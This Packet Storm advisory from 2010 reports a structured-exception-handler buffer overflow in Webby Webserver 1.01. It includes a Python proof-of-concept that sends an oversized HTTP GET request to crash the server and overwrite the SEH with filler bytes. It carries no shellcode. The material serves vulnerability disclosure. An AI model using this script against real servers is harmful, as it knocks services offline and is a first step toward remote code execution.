what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Webby Webserver 1.01 Buffer Overflow

Webby Webserver 1.01 Buffer Overflow
Posted May 26, 2010
Authored by Michael Messner

Webby Webserver version 1.01 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | c1efddb1b13c33f48bca2724a4a2cd55dd316b60fd3c13ef1e71beab2ce48b4e

Webby Webserver 1.01 Buffer Overflow

Change Mirror Download
---------------------------------------------

Webby Webserver v1.01
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)
Date: 25.05.2010

---------------------------------------------

- Description

Webby is a small webserver for the windows operating system.

- buffer overflow vulnerability

The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs.

- Solution

No known solution available.
No contact details of the author found.

- Credits

The vulnerability was discovered by Michael Messner from Integralis
michael#dot#messner#at#integralis#dot#com

- Timeline

25.05.2010 - Vulnerability discovered

- Reference

Download vulnerable software
http://www.shareware.de/webby-webserver/

- POC

#!/usr/bin/python

import socket
import sys
import os.path
import time

if len(sys.argv) < 2:
print "Usage: webby.py <IP> <port>"
sys.exit(0)

ips = sys.argv[1]
port = int(sys.argv[2])

string = "A"*790
string += "\x90"*4
string += "\x42"*105

method = "GET"
print "starting POC for:", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)

payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'

print "\r\nsending payload"
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))
print "..."

print payload
s.send(payload)
print "finished with method %s and payload %s" % (method,payload)
print "... check SEH"
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close